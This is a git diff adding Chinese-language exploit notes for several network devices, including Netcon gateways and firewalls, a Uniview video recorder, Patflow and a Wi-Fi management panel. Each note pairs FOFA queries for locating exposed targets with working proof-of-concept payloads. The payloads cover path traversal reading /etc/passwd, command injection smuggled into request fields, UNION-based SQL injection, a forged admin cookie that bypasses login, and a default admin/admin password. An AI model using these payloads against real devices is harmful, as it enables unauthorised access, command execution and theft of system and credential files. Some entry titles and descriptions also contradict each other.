+![image-20220519183319607](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191833705.png)
--- a/网络设备漏洞/奇安信网康
+++ b/网络设备漏洞/奇安信网康
@ -0,0 +1,47 @@
+# 网康 NS-ASG安全网关 cert_download.php 任意文件读取漏洞
+
+## 漏洞描述
+
+网康 NS-ASG安全网关 cert_download.php 文件存在任意文件读取漏洞
+
+## 漏洞影响
+
+```
+网康 NS-ASG安全网关
+```
+
+## FOFA
+
+```
+网康 NS-ASG安全网关
+```
+
+## 漏洞复现
+
+出现漏洞的文件为 **/admin/cert_download.php**
+
+```php
+![2](C:\Users\47236\Desktop\2.png)<?php
+$filename = substr($file,strpos('certs/',$certfile)+6);
+//文件的类型
+header('Content-type: application/pdf');
+//下载显示的名字
+header('Content-Disposition: attachment; filename="'.$filename.'"');
+readfile("$certfile");
+exit();
+?>
+```
+
+此文件没有对身份进行校验即可下载任意文件
+
+```plain
+/admin/cert_download.php?file=test.txt&certfile=../../../../../../../../etc/passwd
+```
+
+![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162231024.png)
+
+```plain
+/admin/cert_download.php?file=test.txt&certfile=cert_download.php
+```
+
+![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162234357.png)
--- a/网络设备漏洞/奇安信网康下一代防火墙
+++ b/网络设备漏洞/奇安信网康下一代防火墙
@ -0,0 +1,50 @@
+# 奇安信网康 下一代防火墙 router 远程命令执行漏洞
+
+## 漏洞描述
+
+奇安信 网康下一代防火墙存在远程命令执行，通过漏洞攻击者可以获取服务器权限
+
+## 漏洞影响
+
+```
+奇安信 网康下一代防火墙
+```
+
+## FOFA
+
+```
+app="网康科技-下一代防火墙"
+```
+
+## 漏洞复现
+
+登录页面如下
+
+![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162229920.png)
+
+发送如下请求包
+
+```plain
+![2](C:\Users\47236\Desktop\2.png)POST /directdata/direct/router HTTP/1.1
+Host: XXX.XXX.XXX.XXX
+Connection: close
+Content-Length: 179
+Cache-Control: max-age=0
+sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
+sec-ch-ua-mobile: ?0
+Content-Type: application/json
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+
+{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/test_cmd.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}
+```
+
+再请求获取命令执行结果
+
+```plain
+http://xxx.xxx.xxx.xxxx/test_cmd.txt
+```
+
+![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162229568.png)
+
--- a/网络设备漏洞/浙江宇视科技网络视频录像机
+++ b/网络设备漏洞/浙江宇视科技网络视频录像机
@ -0,0 +1,31 @@
+# 浙江宇视科技 网络视频录像机 ISC LogReport.php 远程命令执行漏洞
+
+## 漏洞描述
+
+浙江宇视科技 网络视频录像机 ISC /Interface/LogReport/LogReport.php 页面，fileString 参数过滤不严格，导致攻击者可执行任意命令
+
+## 漏洞影响
+
+```
+浙江宇视科技 网络视频录像机 ISC
+```
+
+## FOFA
+
+```
+app="uniview-ISC"
+```
+
+## 漏洞复现
+
+登录页面
+
+![image-20220519183432893](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191834953.png)
+
+验证POC
+
+```
+/Interface/LogReport/LogReport.php?action=execUpdate&fileString=x;id>1.txt
+```
+
+![image-20220519183528302](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191835400.png)
--- a/网络设备漏洞/百卓
+++ b/网络设备漏洞/百卓
@ -0,0 +1,33 @@
+# 百卓 Patflow showuser.php 后台SQL注入漏洞
+
+## 漏洞描述
+
+百卓 Patflow showuser.php文件参数过滤不充分，导致后台存在SQL注入漏洞
+
+## 漏洞影响
+
+```
+百卓 Patflow
+```
+
+## FOFA
+
+```
+"Patflow"
+```
+
+## 漏洞复现
+
+登录页面
+
+![image-20220519183747439](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191837588.png)
+
+默认口令登录后台 admin/admin
+
+存在漏洞的文件为 shwouser.php,验证POC为
+
+```
+/user/showuser.php?id=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,(select%20group_concat(SCHEMA_NAME)%20f
+```
+
+![image-20220519183758066](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191837110.png)
--- a/网络设备漏洞/西迪特
+++ b/网络设备漏洞/西迪特
@ -0,0 +1,31 @@
+# 西迪特 Wi-Fi Web管理 Cookie 越权访问漏洞
+
+## 漏洞描述
+
+西迪特 Wi-Fi Web管理系统后台过滤不足导致远程命令执行漏洞
+
+## 漏洞影响
+
+```
+西迪特 Wi-Fi Web管理
+```
+
+## FOFA
+
+```
+title=="Wi-Fi Web管理"
+```
+
+## 漏洞复现o
+
+登录页面
+
+![image-20220519183944313](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191839372.png)
+
+添加Cookie，即可登录后台
+
+```
+Cookie: timestamp=0; cooLogin=1; cooUser=admin
+```
+
+![image-20220519184113756](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191841849.png)
--- a/网络设备漏洞/西迪特
+++ b/网络设备漏洞/西迪特
@ -0,0 +1,33 @@
+# 西迪特 Wi-Fi Web管理 jumpto.php 后台命令执行漏洞
+
+## 漏洞描述
+
+西迪特 Wi-Fi Web管理系统后台过滤不足导致远程命令执行漏洞
+
+## 漏洞影响
+
+```
+西迪特 Wi-Fi Web管理
+```
+
+## 网络测绘
+
+```
+title=="Wi-Fi Web管理"
+```
+
+## 漏洞复现o
+
+登录页面
+
+![image-20220519183944313](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191841065.png)
+
+通过越权漏洞获取权限，添加Cookie
+
+```
+Cookie: timestamp=0; cooLogin=1; cooUser=admin
+```
+
+进入后台后，诊断功能点存在命令拼接执行漏洞
+
+![image-20220519184158173](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191841279.png)